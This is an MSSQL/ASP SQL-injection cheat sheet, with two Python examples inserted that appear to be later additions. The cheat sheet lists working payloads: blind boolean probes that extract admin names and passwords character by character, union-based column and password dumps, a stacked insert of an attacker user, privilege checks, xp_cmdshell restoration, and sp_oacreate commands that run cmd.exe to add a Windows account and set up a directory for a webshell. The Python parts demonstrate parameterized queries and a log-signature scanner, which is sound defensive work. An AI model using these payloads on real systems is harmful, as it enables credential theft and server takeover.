1. Determine whether there is an injection point (compare the responses to the two probes):
; and 1=1
; and 1=2
2. Guess the table name; common names are admin, adminuser, user, pass, password, ...
and 0<>(select count(*) from *)
and 0<>(select count(*) from admin)  --- determine whether the admin table exists
3. Guess the number of accounts: if 0< returns the normal page and 1< returns the error page, there is exactly one account.
and 0<(select count(*) from admin)
and 1<(select count(*) from admin)
4. Guess the field names by putting the expected field name inside the len() brackets.
and 1=(select count(*) from admin where len(*)>0)--
and 1=(select count(*) from admin where len(name)>0)  --- user field name
and 1=(select count(*) from admin where len(password)>0)  --- password field name
5. Guess the length of each field: vary the number compared with len() (starting from 0) until the correct page is returned.
and 1=(select count(*) from admin where len(*)>0)
and 1=(select count(*) from admin where len(name)>6)  --- error
and 1=(select count(*) from admin where len(name)>5)  --- correct, so the length is 6
and 1=(select count(*) from admin where len(name)=6)  --- correct
and 1=(select count(*) from admin where len(password)>11)  --- correct
and 1=(select count(*) from admin where len(password)>12)  --- error, so the length is 12
and 1=(select count(*) from admin where len(password)=12)  --- correct
6. Guess the characters one at a time.
and 1=(select count(*) from admin where left(name,1)=a)  --- guess the first character of the user account
and 1=(select count(*) from admin where left(name,2)=ab)  --- guess the second character of the user account
Keep adding one character at a time, up to the length guessed above, and the account name comes out in full.
and 1=(select top 1 count(*) from admin where asc(mid(pass,5,1))=51)--
This query can also guess Chinese user names and passwords: replace the number after "=" with the character's ASC code, then convert the code that matches back into a character.
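The probes in steps 1 to 6 work only because the application pastes the request parameter straight into its SQL string. The Python below is an added example, not part of these notes: it builds a small SQLite table in memory as a stand-in for the MSSQL admin table (the table, its rows and all function names are constructed here), runs the step 1 pair of probes against a concatenated query and against a parameterized one, and adds a hypothetical integer check as a second layer. Only the concatenated version answers the two probes differently.

```python
import sqlite3


# Constructed stand-in for the "admin" table probed in the notes (SQLite, not MSSQL).
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin (id INTEGER, name TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO admin VALUES (?, ?, ?)",
        [(1, "editor", "s3cret-value"), (2, "ops", "another-one")],
    )
    conn.commit()
    return conn


def count_vulnerable(conn: sqlite3.Connection, user_id: str) -> int:
    """The pattern every probe in the notes depends on: the parameter is
    concatenated into the SQL text, so 'and 1=2' becomes part of the WHERE clause."""
    sql = "SELECT count(*) FROM admin WHERE id = " + user_id
    return conn.execute(sql).fetchone()[0]


def count_parameterized(conn: sqlite3.Connection, user_id: str) -> int:
    """Same lookup with a bound parameter: the whole string is compared as one
    value against the id column, so 'and ...' never reaches the SQL parser."""
    sql = "SELECT count(*) FROM admin WHERE id = ?"
    return conn.execute(sql, (user_id,)).fetchone()[0]


def count_validated(conn: sqlite3.Connection, user_id: str) -> int:
    """Defence in depth (hypothetical helper, not from the notes): an id must be
    a decimal integer, so anything else is rejected before it nears the database."""
    if not user_id.isdigit():
        raise ValueError("id must be a decimal integer")
    return count_parameterized(conn, user_id)


def injection_point(lookup, conn: sqlite3.Connection, base: str = "1") -> bool:
    """Step 1 of the notes as a check a regression test can run: True when the
    'and 1=1' and 'and 1=2' probes yield different answers."""
    true_probe = lookup(conn, base + " and 1=1")
    false_probe = lookup(conn, base + " and 1=2")
    return true_probe != false_probe


if __name__ == "__main__":
    db = make_db()
    print("concatenated query is injectable:", injection_point(count_vulnerable, db))    # True
    print("parameterized query is injectable:", injection_point(count_parameterized, db))  # False
```

Run it directly to see the two verdicts. The same check, pointed at a real endpoint, is a cheap regression test for every integer parameter a page reads; the fix is the parameterized form, and it covers the length and character probing of steps 4 to 6 as well, because none of the probe text reaches the parser.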
group by users.id having 1=1--
group by users.id, users.username, users.password, users.privs having 1=1--
; insert into users values (666, attacker, foobar, 0xffff)--
union select top 1 COLUMN_NAME from INFORMATION_SCHEMA.columns where TABLE_NAME=logintable--
union select top 1 COLUMN_NAME from INFORMATION_SCHEMA.columns where TABLE_NAME=logintable where COLUMN_NAME not in (login_id)--
union select top 1 COLUMN_NAME from INFORMATION_SCHEMA.columns where TABLE_NAME=logintable where COLUMN_NAME not in (login_id, login_name)--
union select top 1 login_name from logintable--
union select top 1 password from logintable where login_name=Rahul--
Check the server patch level (with SP4 installed this returns an error):
and 1=(select @@version)--
Check the permissions of the database connection account. If the normal page is returned, the account has sysadmin server-role permissions.
and 1=(select IS_SRVROLEMEMBER(sysadmin))--
Determine the database connection account (if the connection uses the sa account the normal page is returned, proving that the connection account is sa).
and sa=(select system_user)--
and user_name()=dbo--
and 0<>(select user_name())--
Check whether xp_cmdshell has been deleted.
and 1=(select count(*) from master.dbo.sysobjects where xtype=x and name=xp_cmdshell)--
Restoring xp_cmdshell after it has been deleted (an absolute path to the DLL is also supported):
; exec master.dbo.sp_addextendedproc xp_cmdshell, xplog70.dll--
; exec master.dbo.sp_addextendedproc xp_cmdshell, c:\inetpub\wwwroot\xplog70.dll--
Reverse-ping your own host as a test:
; use master; declare @s int; exec sp_oacreate "wscript.shell", @s out; exec sp_oamethod @s, "run", NULL, "cmd.exe /c ping 192.168.0.1";--
Add an account:
; declare @shell int exec sp_oacreate wscript.shell, @shell output exec sp_oamethod @shell, run, null, C:\winnt\system32\cmd.exe /c net user jiaoniang$ 1866574 /add--
Create a virtual directory for the E drive:
; declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "Default Web Site" -v "e", "e:"--
Set the access permissions (used together with writing a webshell):
declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse
Tip: %5c (= \), or submit / and modify %5
and 0<>(select top 1 paths from newtable)--
Obtain the database name (dbid 1 to 5 are the system databases; only 6 and above need to be determined):
and 1=(select name from master.dbo.sysdatabases where dbid=7)--
and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
Submit dbid=7, 8, 9, ... to get more database names.
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U)  --- get the first user table
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U and name not in (Admin))  --- get the other tables
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype=U and name=admin and uid>(str(id)))  --- brute-force the uid; assume the value found is 18779569 (uid=id)
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569)  --- get one admin field; assume it is user_id
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569 and name not in (id, ...))  --- expose the other fields
and 0<(select user_id from bbs.dbo.admin where username>1)  --- get the user name
In the same way you can get the password, assuming the fields user_id, username, password, etc. exist.
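For the defender, every probe in the privilege checks, the extended-procedure and sp_oacreate section, and the sysdatabases/sysobjects/syscolumns enumeration above leaves a recognisable string in the web server's request log. The Python below is an added example, not part of these notes: it decodes each cs-uri-query field, matches it against signature groups derived from the payloads in these notes (the group names are our own labels), and reports which lines fire. The log lines are constructed IIS W3C-style records; the IPs, timestamps and page names are made up.

```python
import re
from urllib.parse import unquote_plus

# Signature groups built from the probes listed in these notes (MSSQL blind
# injection, schema enumeration, role checks, extended-procedure abuse).
# The group names are our own labels, not something from the notes.
SIGNATURES = {
    "tautology": re.compile(r"\band\s+1\s*=\s*[12]\b"),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b"),
    "schema_enum": re.compile(r"\b(information_schema\.columns|sysobjects|syscolumns|sysdatabases)\b"),
    "role_probe": re.compile(r"\b(is_srvrolemember|system_user|user_name)\b|@@version"),
    "xp_extproc": re.compile(r"\b(xp_cmdshell|sp_addextendedproc|sp_oacreate|sp_oamethod)\b"),
    "stacked_query": re.compile(r";\s*(exec|declare|insert|use)\b"),
}


def normalize(query: str) -> str:
    """Decode twice (catches double-encoded payloads), lower-case, and collapse
    whitespace so that 'And%20%201%3D1' and 'and 1=1' look the same."""
    decoded = unquote_plus(unquote_plus(query))
    return re.sub(r"\s+", " ", decoded).lower()


def classify(query: str) -> list:
    """Return the sorted list of signature labels that fire on one query string."""
    text = normalize(query)
    return sorted(label for label, pattern in SIGNATURES.items() if pattern.search(text))


def scan(lines: list) -> list:
    """Scan IIS W3C-style lines (date time c-ip method cs-uri-stem cs-uri-query status)
    and return (line number, decoded query, labels) for every line that fires."""
    hits = []
    for number, line in enumerate(lines, start=1):
        fields = line.split()
        if len(fields) < 6:
            continue  # malformed or truncated record: skip rather than crash
        query = fields[5]
        labels = classify(query)
        if labels:
            hits.append((number, normalize(query), labels))
    return hits


# Constructed sample log: the payloads are the ones from these notes, URL-encoded
# the way an ASP front end would log them; hosts, IPs and timestamps are made up.
SAMPLE_LOG = [
    "2003-05-12 10:01:02 10.0.0.5 GET /news.asp id=1 200",
    "2003-05-12 10:01:03 10.0.0.5 GET /news.asp id=1+and+1%3D1 200",
    "2003-05-12 10:01:04 10.0.0.5 GET /news.asp id=1+and+1%3D2 500",
    "2003-05-12 10:01:09 10.0.0.5 GET /news.asp id=1+and+1%3D(select+is_srvrolemember(sysadmin))-- 200",
    "2003-05-12 10:01:15 10.0.0.5 GET /news.asp id=1;exec+master.dbo.sp_oacreate+wscript.shell,@s+out-- 200",
    "2003-05-12 10:01:20 10.0.0.5 GET /news.asp id=1+union+select+top+1+column_name+from+information_schema.columns+where+table_name%3Dlogintable-- 500",
    "2003-05-12 10:02:00 10.0.0.9 GET /about.asp page=2 200",
]

if __name__ == "__main__":
    for number, query, labels in scan(SAMPLE_LOG):
        print(f"line {number}: {', '.join(labels)}  <- {query}")
```

This is a string baseline, not a WAF: it survives URL and double-URL encoding, but comment insertion (/**/), char() encoding and alternate whitespace need further canonicalisation before matching. A hit on the xp_extproc or stacked_query group deserves a high-priority alert, since those strings only appear once the earlier probes have succeeded; the durable controls are parameterised queries in the application and disabling xp_cmdshell and Ole Automation Procedures on the database server.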